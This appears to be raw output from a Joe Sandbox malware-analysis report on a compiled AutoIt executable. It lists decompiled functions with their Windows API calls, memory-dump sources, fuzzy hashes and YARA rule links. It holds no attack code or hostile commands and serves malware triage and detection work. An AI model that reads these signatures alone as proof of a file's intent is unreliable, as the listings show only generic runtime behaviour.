                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0013EB30
                                                                                                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0013EB46
                                                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0013EB55
                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0013EB64
                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0013EB6E
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0013EB75
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 839392675-0
                                                                                                                                                                                                                                          • Opcode ID: a31c37176ba444a8b41eaeba7e5b3ad702743af88d0f433017ba90c4fe630518
                                                                                                                                                                                                                                          • Instruction ID: 4b4aa4896ab4134313099524b022305c3783255b5f13ab41e2208b6fea7c96ae
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a31c37176ba444a8b41eaeba7e5b3ad702743af88d0f433017ba90c4fe630518
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1F01772240168BBE6216B62DC0EEFB7A7CEFCAB11F000158F642D1591A7E05A418AF9
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00127439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetClientRect.USER32(?), ref: 00127452
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00127469
                                                                                                                                                                                                                                          • GetWindowDC.USER32(?), ref: 00127475
                                                                                                                                                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 00127484
                                                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00127496
                                                                                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 001274B0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 272304278-0
                                                                                                                                                                                                                                          • Opcode ID: 83c9a57a1de702fe84ef81cc76765174d76de166cb57f4024f2d0226483aed00
                                                                                                                                                                                                                                          • Instruction ID: 98f0895308ce99ae5723b6d7c35101a8b56c0e9cde4cd53f0477c251bd243cb9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83c9a57a1de702fe84ef81cc76765174d76de166cb57f4024f2d0226483aed00
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05018B31500255EFDB106FA4EC08BFABBB6FF04321F114060F956A25A0CB711E91AB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00131874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0013187F
                                                                                                                                                                                                                                          • UnloadUserProfile.USERENV(?,?), ref: 0013188B
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00131894
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0013189C
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 001318A5
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001318AC
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 146765662-0
                                                                                                                                                                                                                                          • Opcode ID: b2ab9efd47f3e3d60fbf73b52aa71b0353794d35c6d929f6e699a060b202f9ac
                                                                                                                                                                                                                                          • Instruction ID: 7cfdcc471efd30d7f791c56cf558852f3ebbe30a50971d61937b92f8cb2e2f16
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2ab9efd47f3e3d60fbf73b52aa71b0353794d35c6d929f6e699a060b202f9ac
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFE0ED36004111FBDB016FA2ED0C925BF39FF4A7227108221F26581970CBB254A0DFA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D7620: _wcslen.LIBCMT ref: 000D7625
                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0013C6EE
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013C735
                                                                                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0013C79C
                                                                                                                                                                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0013C7CA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                          • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                          • Opcode ID: 7174bdc741bf3414403f940fbcffbf4c85951c35d40922b1bc3716cc0c5578e4
                                                                                                                                                                                                                                          • Instruction ID: 14633e3e69c62244943cfd5edae3fe966566f6504e32a771de95cab419ec77b9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7174bdc741bf3414403f940fbcffbf4c85951c35d40922b1bc3716cc0c5578e4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03519F726143419BD7149F28CC85BBBB7E8AF49314F040A2DF995F32A1DB70D944CB96
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00137206
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0013723C
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0013724D
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001372CF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                          • String ID: DllGetClassObject
                                                                                                                                                                                                                                          • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                          • Opcode ID: f32e26e61f7152bcab2d5a69a55e8eeaae386474c602d0139c90b5753363409f
                                                                                                                                                                                                                                          • Instruction ID: 27ca25eb3b76522bfe997d8c3d17699d160b99592002623a411fed7d735943c2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f32e26e61f7152bcab2d5a69a55e8eeaae386474c602d0139c90b5753363409f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 754141B1604205EFDF25CF94C884AAB7BA9EF45310F1580ADFD059F28AD7B1D945CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00163D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00163E35
                                                                                                                                                                                                                                          • IsMenu.USER32(?), ref: 00163E4A
                                                                                                                                                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00163E92
                                                                                                                                                                                                                                          • DrawMenuBar.USER32 ref: 00163EA5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                          • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                          • Opcode ID: 84890400522a9e6422343a46106e12e3dfa6f9359387d5d7e91e73eabe1694a9
                                                                                                                                                                                                                                          • Instruction ID: 793b702d386320ecdfbbac711c926f9994ba132d437c54e7845050a2da1f77ec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84890400522a9e6422343a46106e12e3dfa6f9359387d5d7e91e73eabe1694a9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB415675A01209AFDB10DF50DC84AEABBF9FF49354F044129E925A7250D735AE61CFA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00131DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                            • Part of subcall function 00133CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00133CCA
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00131E66
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00131E79
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00131EA9
                                                                                                                                                                                                                                            • Part of subcall function 000D6B57: _wcslen.LIBCMT ref: 000D6B6A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                          • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                          • Opcode ID: 3188e34b5fc5248ece552ea23087bfba5a3940f5add1d34417c64de29031f761
                                                                                                                                                                                                                                          • Instruction ID: 79d5509d7082f64238c79e9dbd0a3aa5d98e9813840f025b75561e985b647159
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3188e34b5fc5248ece552ea23087bfba5a3940f5add1d34417c64de29031f761
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B213871A00204BEDB19AB64DC46CFFB7B9DF45360F10412AF826A72E2DB754D4A9630
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00162F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00162F8D
                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00162F94
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00162FA9
                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00162FB1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                          • String ID: SysAnimate32
                                                                                                                                                                                                                                          • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                          • Opcode ID: fa8aa46a7bfe6aa7c6d12ed96c709e87e425cfec054bc00278e05703093d5b7a
                                                                                                                                                                                                                                          • Instruction ID: 333e447809d86b0433978fb1780aa9ae69eaea04670dae3cbdc326dce7ad221b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa8aa46a7bfe6aa7c6d12ed96c709e87e425cfec054bc00278e05703093d5b7a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1218C72204605ABEB104FA4DC80EBB77B9EF59364F104659FA50D61A0D7B1DCA197A0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000F4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,000F4D1E,001028E9,?,000F4CBE,001028E9,001988B8,0000000C,000F4E15,001028E9,00000002), ref: 000F4D8D
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000F4DA0
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,000F4D1E,001028E9,?,000F4CBE,001028E9,001988B8,0000000C,000F4E15,001028E9,00000002,00000000), ref: 000F4DC3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                          • Opcode ID: 415e4422af9170a5db208e9dcd0570c9ca9000ac67d0f80aff76b5b1aa38a43f
                                                                                                                                                                                                                                          • Instruction ID: ce1fc2d8e264d2c9e93cbe97df19076e48cc17218ae8f0b3aace45e938d53275
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 415e4422af9170a5db208e9dcd0570c9ca9000ac67d0f80aff76b5b1aa38a43f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48F08C34A00208EBDB159B94DC49BFEBBF8EB44712F0040A9F949A2A60CB705980DAD0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,000D4EDD,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4E9C
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000D4EAE
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,000D4EDD,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4EC0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                          • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                          • Opcode ID: 877d8353bf84fe244f32dc4942e93d530f2934349c99cbb30ab1d074a3a5c141
                                                                                                                                                                                                                                          • Instruction ID: 249b5725119f3131d421f6614263c16b339a444c9b20eef6c64da510b8b0385c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 877d8353bf84fe244f32dc4942e93d530f2934349c99cbb30ab1d074a3a5c141
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29E0CD35A01722ABD27117256C18B7F67D4AF82FA27090116FC40D2300DFB0CD4144F0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00113CDE,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4E62
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000D4E74
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00113CDE,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4E87
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                          • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                          • Opcode ID: 0e2cc8adb7033a2c1eba9194de869f7962aeec76a8f108b91aefd1e3e7c46662
                                                                                                                                                                                                                                          • Instruction ID: a9e0906e4817294dbd2f1a180c0891b59226a716cd775e621150f0fc5402eafb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e2cc8adb7033a2c1eba9194de869f7962aeec76a8f108b91aefd1e3e7c46662
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6D01235502761A79A621B25AC18DEB6B58AFC6B513050616F945A2214CFB0CD4185E0
                                                                                                                                                                                                                                          Uniqueness

